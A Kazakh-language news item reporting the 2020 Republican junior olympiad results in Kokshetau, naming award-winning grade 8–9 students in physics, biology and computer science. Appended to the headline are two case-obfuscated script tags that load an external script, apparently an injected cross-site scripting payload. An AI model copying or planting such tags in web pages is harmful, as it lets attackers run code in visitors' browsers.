Республикалық юниор олимпиадасының қорытындысы бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.11.2020

2020 жылдың 28 қазанында Көкшетау қаласы, «Білім-инновация» лицей-интернатының базасында 8-9 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы пәндер бойынша Республикалық юниор олимпиадасы өткізілді.

Олимпиаданың мақсаты − оқушылардың жаратылыстану-математикалық бағыттағы пәндерді оқытуды ынталандыру, жастарды жоғары дәрежедегі олимпиадаларға дайындау.

Олимпиада келесі жалпы білім беру пәндері бойынша өткізілді: математика, физика, информатика, биология, химия, география.

Аталмыш олимпиадаға Ақмола облысынан 25 оқушы қатысты.

Олимпиада қорытындысы нәтижесінде ІІ дәрежелі дипломмен физика пәні бойынша Черемнов Никита - Көкшетау қаласы, гуманитарлы-техникалық мектеп-лицейінің 9 сынып оқушысы марапатталды.

Биология пәні бойынша ІІІ дәрежелі дипломдармен келесі оқушылар марапатталды:

  1. Базкенов    Руслан - Көкшетау қаласы, «Білім-инновация» лицей-интернатының 8  сынып оқушысы;
  2. Гулый         Руслан - Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 9 сынып оқушысы;
  3. Боровская  Анастасия - Көкшетау қаласы, гуманитарлы-техникалық мектеп-лицейінің     9 сынып оқушысы.

  Информатика пәні бойынша ІІІ дәрежелі дипломдармен келесі оқушылар марапатталды:

  1. Ибодуллаев Руслан - Көкшетау қаласы, «Білім-инновация» лицей-интернатының 9 сынып оқушысы;
  2. Шарипов     Алишер - Көкшетау қаласы, «Білім-инновация» лицей-интернатының 9 сынып оқушысы.

Жүлдегерлерімізді құттықтаймыз, алдағы уақытта талай биік белестерді бағындыруына тілектеспіз!

Просмотров: 373


Пікір қосу



Деректерді қолтаңбаға қосу